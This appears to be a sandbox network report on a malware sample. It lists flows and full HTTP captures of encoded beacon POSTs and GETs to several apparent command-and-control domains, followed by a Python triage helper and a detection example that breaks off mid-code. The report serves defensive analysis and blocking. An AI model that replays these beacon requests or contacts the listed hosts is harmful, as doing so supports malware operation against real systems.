Network Analysis

TCP Requests

Source | Destination | Host |
---|---|---|
192.168.56.101:49174 | 103.224.182.242:80 | www.shopystart.store |
192.168.56.101:49175 | 103.224.182.242:80 | www.shopystart.store |
192.168.56.101:49176 | 103.224.182.242:80 | www.shopystart.store |
192.168.56.101:49177 | 103.224.182.242:80 | www.shopystart.store |
192.168.56.101:49167 | 104.21.80.1:80 | www.u939.top |
192.168.56.101:49168 | 104.21.80.1:80 | www.u939.top |
192.168.56.101:49185 | 104.21.95.250:80 | www.436bet.lol |
192.168.56.101:49187 | 104.21.95.250:80 | www.436bet.lol |
192.168.56.101:49180 | 13.248.213.45:80 | www.thought-hop.app |
192.168.56.101:49181 | 13.248.213.45:80 | www.thought-hop.app |
192.168.56.101:49178 | 146.75.50.132:80 | www.nordstrom.com |
192.168.56.101:49179 | 146.75.50.132:80 | www.nordstrom.com |
192.168.56.101:49169 | 194.195.208.62:80 | www.sqlite.org |
192.168.56.101:49188 | 208.91.197.27:80 | www.igbee.online |
192.168.56.101:49189 | 208.91.197.27:80 | www.igbee.online |
192.168.56.101:49182 | 66.29.133.199:80 | www.zixvy.xyz |
192.168.56.101:49183 | 66.29.133.199:80 | www.zixvy.xyz |
-
UDP Requests

Source | Destination | Service |
---|---|---|
192.168.56.101:52797 | 164.124.101.2:53 | DNS |
192.168.56.101:52815 | 164.124.101.2:53 | DNS |
192.168.56.101:53004 | 164.124.101.2:53 | DNS |
192.168.56.101:53850 | 164.124.101.2:53 | DNS |
192.168.56.101:54148 | 164.124.101.2:53 | DNS |
192.168.56.101:54883 | 164.124.101.2:53 | DNS |
192.168.56.101:55146 | 164.124.101.2:53 | DNS |
192.168.56.101:59002 | 164.124.101.2:53 | DNS |
192.168.56.101:61950 | 164.124.101.2:53 | DNS |
192.168.56.101:137 | 192.168.56.255:137 | NetBIOS name service (subnet broadcast) |
192.168.56.101:138 | 192.168.56.255:138 | NetBIOS datagram service (subnet broadcast) |
192.168.56.101:53007 | 239.255.255.250:1900 | SSDP (multicast) |
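An added triage helper, not part of the sandbox report. It parses the two listings above in the raw form the extraction produced (source, destination, and for TCP the HTTP Host name run together after the destination port), separates the local noise (resolver queries, NetBIOS subnet broadcast, SSDP multicast) from external destinations, and emits (ip, host) pairs for pivoting. The sample lines are copied from the listings; the class labels and the /24 directed-broadcast check are my assumptions about the sandbox network.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample: lines copied from the sandbox listing above, in the raw
# form the report extraction produced, where the HTTP Host name is run
# together with the destination port ("...:80www.example").
TCP_LINES = [
    "192.168.56.101:49174 103.224.182.242:80www.shopystart.store",
    "192.168.56.101:49167 104.21.80.1:80www.u939.top",
    "192.168.56.101:49185 104.21.95.250:80www.436bet.lol",
    "192.168.56.101:49180 13.248.213.45:80www.thought-hop.app",
    "192.168.56.101:49178 146.75.50.132:80www.nordstrom.com",
    "192.168.56.101:49169 194.195.208.62:80www.sqlite.org",
    "192.168.56.101:49188 208.91.197.27:80www.igbee.online",
    "192.168.56.101:49182 66.29.133.199:80www.zixvy.xyz",
]
UDP_LINES = [
    "192.168.56.101:52797 164.124.101.2:53",
    "192.168.56.101:137 192.168.56.255:137",
    "192.168.56.101:138 192.168.56.255:138",
    "192.168.56.101:53007 239.255.255.250:1900",
]

# src_ip:src_port  dst_ip:dst_port[host]. The port is the run of digits after
# the colon, so a Host name that itself starts with a digit would be mis-split;
# none of the names in this report do.
_FLOW = re.compile(
    r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s+"
    r"(\d{1,3}(?:\.\d{1,3}){3}):(\d+)([A-Za-z][^\s]*)?$"
)


def parse_flow(line, proto):
    m = _FLOW.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised flow line: {line!r}")
    src_ip, src_port, dst_ip, dst_port, host = m.groups()
    return {
        "proto": proto,
        "src_ip": src_ip, "src_port": int(src_port),
        "dst_ip": dst_ip, "dst_port": int(dst_port),
        "host": host or "",
    }


def classify(flow):
    """Coarse triage label. Treating x.x.x.255 on a private range as the subnet
    broadcast assumes a /24 sandbox network; the report does not state the mask."""
    dst = ipaddress.ip_address(flow["dst_ip"])
    if flow["proto"] == "udp" and flow["dst_port"] == 53:
        return "dns"
    if dst.is_multicast:
        return "multicast"
    if dst.is_private and flow["dst_ip"].endswith(".255"):
        return "local-broadcast"
    if dst.is_private:
        return "local"
    return "external"


def summarize(tcp_lines, udp_lines):
    flows = [parse_flow(l, "tcp") for l in tcp_lines]
    flows += [parse_flow(l, "udp") for l in udp_lines]
    by_class = defaultdict(list)
    for f in flows:
        by_class[classify(f)].append(f)
    # External destinations keyed by IP, collecting every Host name seen on them;
    # several hosts on one IP (CDN fronting) is itself worth noticing.
    external = defaultdict(set)
    for f in by_class["external"]:
        if f["host"]:
            external[f["dst_ip"]].add(f["host"])
    return {
        "counts": {k: len(v) for k, v in by_class.items()},
        "external": {ip: sorted(h) for ip, h in external.items()},
        "resolvers": sorted({f["dst_ip"] for f in by_class["dns"]}),
    }


def iocs(summary):
    """Flat (ip, host) pairs for blocklists or pivots. Review before use: a
    legitimate site the sample contacted (www.nordstrom.com, www.sqlite.org
    here) lands in the list too."""
    return sorted((ip, h) for ip, hosts in summary["external"].items() for h in hosts)


if __name__ == "__main__":
    s = summarize(TCP_LINES, UDP_LINES)
    print(s["counts"])
    for ip, host in iocs(s):
        print(f"{ip}\t{host}")
```

The resolver IP and the broadcast/multicast rows are sandbox background; the external rows are the ones to carry into the HTTP section, where the same hosts appear as request targets.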
-
POST 302 http://www.u939.top/bzd4/

Request:
POST /bzd4/ HTTP/1.1
Host: www.u939.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cache-Control: max-age=0
Content-Length: 193
Connection: close
Content-Type: application/x-www-form-urlencoded
Origin: http://www.u939.top
Referer: http://www.u939.top/bzd4/
User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

Response:
HTTP/1.1 302 Found
Date: Wed, 23 Apr 2025 07:28:43 GMT
Content-Length: 0
Connection: close
location: https://tz.wx-ulslyd12.com/app/register.php?site_id=2304&topId=55401
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DSMZfhGICJZMXZw2U2Kz%2BASQrCvUDxecfUXGuO3IqWMxu6AA87sAIMwuzI9m%2BLV3MQWL3GUYGUu1p5l7MRq3CycOLo8UdoQ%2B0nl6x6n1s64fT%2FzkPY7rW1P%2FhUOIHy4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 934ba54d1f707be9-LAX
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=137219&min_rtt=137219&rtt_var=68609&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=729&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET 302 http://www.u939.top/bzd4/?LLic=dfSAi8eFG8BNQSKkeeWstgieQ+CEa6NReeHNvP0PJ6u+RJbJfiLK0etwAJJBhacWKaM27nZDkTYaE096JcPOh2DDpT2lFzPFjknSW/IkA4ndNNbJZBed4KRKzQBeBju3mgs613k=&RoZeZ=y3sZclTe3T0

Request:
GET /bzd4/?LLic=dfSAi8eFG8BNQSKkeeWstgieQ+CEa6NReeHNvP0PJ6u+RJbJfiLK0etwAJJBhacWKaM27nZDkTYaE096JcPOh2DDpT2lFzPFjknSW/IkA4ndNNbJZBed4KRKzQBeBju3mgs613k=&RoZeZ=y3sZclTe3T0 HTTP/1.1
Host: www.u939.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

Response:
HTTP/1.1 302 Found
Date: Wed, 23 Apr 2025 07:28:46 GMT
Content-Length: 0
Connection: close
location: https://tz.wx-ulslyd12.com/app/register.php?site_id=2304&topId=55401
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zUOhi%2F8a5jYAuVyqdP2v58F0Ld5xllIYAfHh0hPqCCcLR7SIilR%2BSJn%2FWvR0UJwYpJ2o7xP9pzTmcqv04n%2FJL1MbNNK7YhMneWtq1RnYHntAEi%2Fif1%2FdhSmizYnT%2FpQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 934ba55d8ca92110-LAX
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=135469&min_rtt=135469&rtt_var=67734&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=498&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET 200 http://www.sqlite.org/2018/sqlite-dll-win32-x86-3230000.zip

Request:
GET /2018/sqlite-dll-win32-x86-3230000.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko
Host: www.sqlite.org
Connection: Keep-Alive
Cache-Control: no-cache

Response:
HTTP/1.1 200 OK
Connection: keep-alive
Date: Wed, 23 Apr 2025 07:28:48 GMT
Last-Modified: Mon, 07 Apr 2025 18:54:09 GMT
Cache-Control: max-age=120
ETag: "m67f41f51s6e1ef"
Content-type: application/zip; charset=utf-8
Content-length: 451055
POST 200 http://www.shopystart.store/xawa/

Request:
POST /xawa/ HTTP/1.1
Host: www.shopystart.store
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cache-Control: max-age=0
Content-Length: 205
Connection: close
Content-Type: application/x-www-form-urlencoded
Origin: http://www.shopystart.store
Referer: http://www.shopystart.store/xawa/
User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

Response:
HTTP/1.1 200 OK
date: Wed, 23 Apr 2025 07:29:01 GMT
server: Apache
set-cookie: __tad=1745393341.6255080; expires=Sat, 21-Apr-2035 07:29:01 GMT; Max-Age=315360000
vary: Accept-Encoding
content-encoding: gzip
content-length: 579
content-type: text/html; charset=UTF-8
connection: close
GET 302 http://www.shopystart.store/xawa/?LLic=Hqe3sOWJvKCWG/x9tNOlnmsQdBHF4VkLrMyXLOB2T5GmWe087lKVGDOw/FRPsxL2tEDkrod/hD8oPOSEwNhmE1ycDQdQk408J5XLpsuL26K2loZJVyUeuNavvlrKPQfBqaCahko=&RoZeZ=y3sZclTe3T0

Request:
GET /xawa/?LLic=Hqe3sOWJvKCWG/x9tNOlnmsQdBHF4VkLrMyXLOB2T5GmWe087lKVGDOw/FRPsxL2tEDkrod/hD8oPOSEwNhmE1ycDQdQk408J5XLpsuL26K2loZJVyUeuNavvlrKPQfBqaCahko=&RoZeZ=y3sZclTe3T0 HTTP/1.1
Host: www.shopystart.store
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

Response:
HTTP/1.1 302 Found
date: Wed, 23 Apr 2025 07:29:04 GMT
server: Apache
set-cookie: __tad=1745393344.2507728; expires=Sat, 21-Apr-2035 07:29:04 GMT; Max-Age=315360000
location: https://www.shopystart.store/xawa/?LLic=Hqe3sOWJvKCWG/x9tNOlnmsQdBHF4VkLrMyXLOB2T5GmWe087lKVGDOw/FRPsxL2tEDkrod/hD8oPOSEwNhmE1ycDQdQk408J5XLpsuL26K2loZJVyUeuNavvlrKPQfBqaCahko=&RoZeZ=y3sZclTe3T0
content-length: 0
content-type: text/html; charset=UTF-8
connection: close
POST 200 http://www.well-prophesied.sbs/h2o8/

Request:
POST /h2o8/ HTTP/1.1
Host: www.well-prophesied.sbs
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cache-Control: max-age=0
Content-Length: 205
Connection: close
Content-Type: application/x-www-form-urlencoded
Origin: http://www.well-prophesied.sbs
Referer: http://www.well-prophesied.sbs/h2o8/
User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

Response:
HTTP/1.1 200 OK
date: Wed, 23 Apr 2025 07:29:09 GMT
server: Apache
set-cookie: __tad=1745393349.2120970; expires=Sat, 21-Apr-2035 07:29:09 GMT; Max-Age=315360000
vary: Accept-Encoding
content-encoding: gzip
content-length: 583
content-type: text/html; charset=UTF-8
connection: close
GET 302 http://www.well-prophesied.sbs/h2o8/?LLic=GasKOeuw1JI5h6tXmsQQYMGJUVrx1eFJOZVDlep8qfAVHybpHoIo+PFBF4ns1FAfwqZlwcxStctxSnKcnqSj+eRL58eeY/R3kJn5hrlHuHS0/dgrlTIfSHBOULAVJxCkB2Uk7D4=&RoZeZ=y3sZclTe3T0

Request:
GET /h2o8/?LLic=GasKOeuw1JI5h6tXmsQQYMGJUVrx1eFJOZVDlep8qfAVHybpHoIo+PFBF4ns1FAfwqZlwcxStctxSnKcnqSj+eRL58eeY/R3kJn5hrlHuHS0/dgrlTIfSHBOULAVJxCkB2Uk7D4=&RoZeZ=y3sZclTe3T0 HTTP/1.1
Host: www.well-prophesied.sbs
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

Response:
HTTP/1.1 302 Found
date: Wed, 23 Apr 2025 07:29:12 GMT
server: Apache
set-cookie: __tad=1745393352.1933830; expires=Sat, 21-Apr-2035 07:29:12 GMT; Max-Age=315360000
location: https://www.well-prophesied.sbs/h2o8/?LLic=GasKOeuw1JI5h6tXmsQQYMGJUVrx1eFJOZVDlep8qfAVHybpHoIo+PFBF4ns1FAfwqZlwcxStctxSnKcnqSj+eRL58eeY/R3kJn5hrlHuHS0/dgrlTIfSHBOULAVJxCkB2Uk7D4=&RoZeZ=y3sZclTe3T0
content-length: 0
content-type: text/html; charset=UTF-8
connection: close
POST 301 http://www.nordstrom.com/98jk/

Request:
POST /98jk/ HTTP/1.1
Host: www.nordstrom.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cache-Control: max-age=0
Content-Length: 205
Connection: close
Content-Type: application/x-www-form-urlencoded
Origin: http://www.nordstrom.com
Referer: http://www.nordstrom.com/98jk/
User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

Response:
HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://www.nordstrom.com/98jk/
Accept-Ranges: bytes
Date: Wed, 23 Apr 2025 07:29:17 GMT
Via: 1.1 varnish
X-Served-By: cache-icn1450063-ICN
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1745393357.476263,VS0,VE0
Strict-Transport-Security: max-age=31536000; includeSubDomains
Server-Timing: HIT-SYNTH, fastly;desc="Edge time";dur=0
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
ACCESS-CONTROL-ALLOW-CREDENTIALS: true
GET 301 http://www.nordstrom.com/98jk/?LLic=6yfylvcvS++fp6TLHWbr9Om1+7b2UWch18pSN7AMWcDhtKMO0/Cw84EQwjIAc2w/A3ifRwr08JZ1XjD7JgM2poD+VAQYWS5a68nT5zaoDlnKZNXeNNMQ+OUueokKl8hgqtq40ZA=&RoZeZ=y3sZclTe3T0

Request:
GET /98jk/?LLic=6yfylvcvS++fp6TLHWbr9Om1+7b2UWch18pSN7AMWcDhtKMO0/Cw84EQwjIAc2w/A3ifRwr08JZ1XjD7JgM2poD+VAQYWS5a68nT5zaoDlnKZNXeNNMQ+OUueokKl8hgqtq40ZA=&RoZeZ=y3sZclTe3T0 HTTP/1.1
Host: www.nordstrom.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

Response:
HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://www.nordstrom.com/98jk/?LLic=6yfylvcvS++fp6TLHWbr9Om1+7b2UWch18pSN7AMWcDhtKMO0/Cw84EQwjIAc2w/A3ifRwr08JZ1XjD7JgM2poD+VAQYWS5a68nT5zaoDlnKZNXeNNMQ+OUueokKl8hgqtq40ZA=&RoZeZ=y3sZclTe3T0
Accept-Ranges: bytes
Date: Wed, 23 Apr 2025 07:29:19 GMT
Via: 1.1 varnish
X-Served-By: cache-icn1450064-ICN
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1745393360.993599,VS0,VE0
Strict-Transport-Security: max-age=31536000; includeSubDomains
Server-Timing: HIT-SYNTH, fastly;desc="Edge time";dur=0
Timing-Allow-Origin: *
cache-control: max-age=5
X-Content-Type-Options: nosniff
POST (no response recorded, status 0) http://www.thought-hop.app/y0er/

Request:
POST /y0er/ HTTP/1.1
Host: www.thought-hop.app
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cache-Control: max-age=0
Content-Length: 205
Connection: close
Content-Type: application/x-www-form-urlencoded
Origin: http://www.thought-hop.app
Referer: http://www.thought-hop.app/y0er/
User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko
GET 200 http://www.thought-hop.app/y0er/?LLic=skpibTBgczcyQH4m12d8C1UJ3RPHJZF3wrOd/jHomuoDvk4OJWpzHm44saXJlLM8fEnYzzT5lGIlIVcd3V+fF+SAeK/GZohWhAiyD9OVQT9eoRINgfF8jLIXuBV+ExgzdvYkTl4=&RoZeZ=y3sZclTe3T0

Request:
GET /y0er/?LLic=skpibTBgczcyQH4m12d8C1UJ3RPHJZF3wrOd/jHomuoDvk4OJWpzHm44saXJlLM8fEnYzzT5lGIlIVcd3V+fF+SAeK/GZohWhAiyD9OVQT9eoRINgfF8jLIXuBV+ExgzdvYkTl4=&RoZeZ=y3sZclTe3T0 HTTP/1.1
Host: www.thought-hop.app
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

Response:
HTTP/1.1 200 OK
content-type: text/html
date: Wed, 23 Apr 2025 07:29:27 GMT
content-length: 274
connection: close
POST 404 http://www.zixvy.xyz/hnte/

Request:
POST /hnte/ HTTP/1.1
Host: www.zixvy.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cache-Control: max-age=0
Content-Length: 205
Connection: close
Content-Type: application/x-www-form-urlencoded
Origin: http://www.zixvy.xyz
Referer: http://www.zixvy.xyz/hnte/
User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

Response:
HTTP/1.1 404 Not Found
Date: Wed, 23 Apr 2025 07:29:33 GMT
Server: Apache
Content-Length: 13840
Connection: close
Content-Type: text/html
GET 404 http://www.zixvy.xyz/hnte/?LLic=sI+u/jozY7y4BLncChw34oy3qiLvCLYPrfQ7iAol4uU1p4g/amPevW/QK39bv96q+0RYO4Tlq1wnZyWsMRRRiThhZPuK1bAAtVzlD/5Gqm+oEyC7jbV+5JETXM/HvY9z4pcpbIw=&RoZeZ=y3sZclTe3T0

Request:
GET /hnte/?LLic=sI+u/jozY7y4BLncChw34oy3qiLvCLYPrfQ7iAol4uU1p4g/amPevW/QK39bv96q+0RYO4Tlq1wnZyWsMRRRiThhZPuK1bAAtVzlD/5Gqm+oEyC7jbV+5JETXM/HvY9z4pcpbIw=&RoZeZ=y3sZclTe3T0 HTTP/1.1
Host: www.zixvy.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

Response:
HTTP/1.1 404 Not Found
Date: Wed, 23 Apr 2025 07:29:35 GMT
Server: Apache
Content-Length: 13840
Connection: close
Content-Type: text/html; charset=utf-8
POST 400 http://www.436bet.lol/lcva/

Request:
POST /lcva/ HTTP/1.1
Host: www.436bet.lol
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cache-Control: max-age=0
Content-Length: 205
Connection: close
Content-Type: application/x-www-form-urlencoded
Origin: http://www.436bet.lol
Referer: http://www.436bet.lol/lcva/
User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

Response:
HTTP/1.1 400 Bad Request
Date: Wed, 23 Apr 2025 07:29:41 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gHPIfm2jSEbHb3UXOTwONm0nsyjs1l506vCzwuxN1jU5unV0brvEbT1cCM6YeOaqhkcaueZC%2FLwlPWixEGFqZqDZBPZazwyGj%2BIG2qOgPS8Aava2F5pqoLTCHRKJCeX%2FJA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 934ba6b8bc9fcb9a-LAX
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=128611&min_rtt=128611&rtt_var=64305&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET 504 http://www.436bet.lol/lcva/?LLic=yZdZFwPo/F7DkqOxVlpI77acvLTqB1eK2prRl5AVT7+V22ij6c1b2GrCApRScaku22nFvhUrd1dFunhapC/kC6lEc/8q+LjQvk+zyagC4zUK5k5HSV9I08dj3iPUh9x2K1T1lq0=&RoZeZ=y3sZclTe3T0

Request:
GET /lcva/?LLic=yZdZFwPo/F7DkqOxVlpI77acvLTqB1eK2prRl5AVT7+V22ij6c1b2GrCApRScaku22nFvhUrd1dFunhapC/kC6lEc/8q+LjQvk+zyagC4zUK5k5HSV9I08dj3iPUh9x2K1T1lq0=&RoZeZ=y3sZclTe3T0 HTTP/1.1
Host: www.436bet.lol
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

Response:
HTTP/1.1 504 Gateway Time-out
Date: Wed, 23 Apr 2025 07:29:43 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 15
Connection: close
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wZT7rHvOoIH4J8Qcp3u6oa141K3C6CFQtevcpVELtS7CHcRA45fZqnmNcfFbv2xTua04Cv8TYfLkAm1TrHhUV4%2BvkSFvLqorEtc4rI1LSfCRLxB4Nzr%2F2hFqbfgcc1LP7w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 934ba6c9293d52a1-LAX
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=132246&min_rtt=132246&rtt_var=66123&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=500&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST (no response recorded, status 0) http://www.igbee.online/tyrp/

Request:
POST /tyrp/ HTTP/1.1
Host: www.igbee.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cache-Control: max-age=0
Content-Length: 205
Connection: close
Content-Type: application/x-www-form-urlencoded
Origin: http://www.igbee.online
Referer: http://www.igbee.online/tyrp/
User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko
GET 200 http://www.igbee.online/tyrp/?LLic=yQRDl9eqxDlbdwexYxSCpR6pr/oobBw9bM4yRFM7l4j8aoJR3UqZzvH2c2cbZPB09p82YJ+A3upk+Qx3qqTmrrfMXWWhvKVFsoH31/tqMrrIuEbR3JJSNGgXQUi267FU2yHTG5M=&RoZeZ=y3sZclTe3T0

Request:
GET /tyrp/?LLic=yQRDl9eqxDlbdwexYxSCpR6pr/oobBw9bM4yRFM7l4j8aoJR3UqZzvH2c2cbZPB09p82YJ+A3upk+Qx3qqTmrrfMXWWhvKVFsoH31/tqMrrIuEbR3JJSNGgXQUi267FU2yHTG5M=&RoZeZ=y3sZclTe3T0 HTTP/1.1
Host: www.igbee.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 735) like Gecko

Response:
HTTP/1.1 200 OK
Date: Wed, 23 Apr 2025 07:29:45 GMT
Server: Apache
Referrer-Policy: no-referrer-when-downgrade
Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
Set-Cookie: vsid=908vr492938986113034733; expires=Mon, 22-Apr-2030 07:29:46 GMT; Max-Age=157680000; path=/; domain=www.igbee.online; HttpOnly
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Fk+nRDAlUi9F7S5JbgYg84VmghLXQmakBc2L142x1oIDfrNmH4yIFKl58dZyGnwC6xpt1HwxDL/vzREAolc7WQ==
Content-Length: 2603
Content-Type: text/html; charset=UTF-8
Connection: close
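An added detection example, not part of the sandbox report. The HTTP exchanges above share one client shape on every host except www.sqlite.org: a form POST of 193 or 205 bytes to a four-character directory, then a GET to the same directory with a two-parameter query `LLic=<base64-like>&RoZeZ=y3sZclTe3T0`, all under the same Lumia 735 User-Agent, and the second query value is identical across every host, www.nordstrom.com included, which responds with an ordinary redirect to HTTPS. The sqlite.org request is a plain file download with a different header set (Keep-Alive, no Accept) and serves as the negative case. The parameter names and sample requests are copied from the page; the thresholds (four-character path, body under 300 bytes, base64-like first value) are my assumptions drawn from this capture, not a published signature.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: (method, url, Content-Length) copied from the request
# headers above; the POST bodies were not captured in the report.
REQUESTS = [
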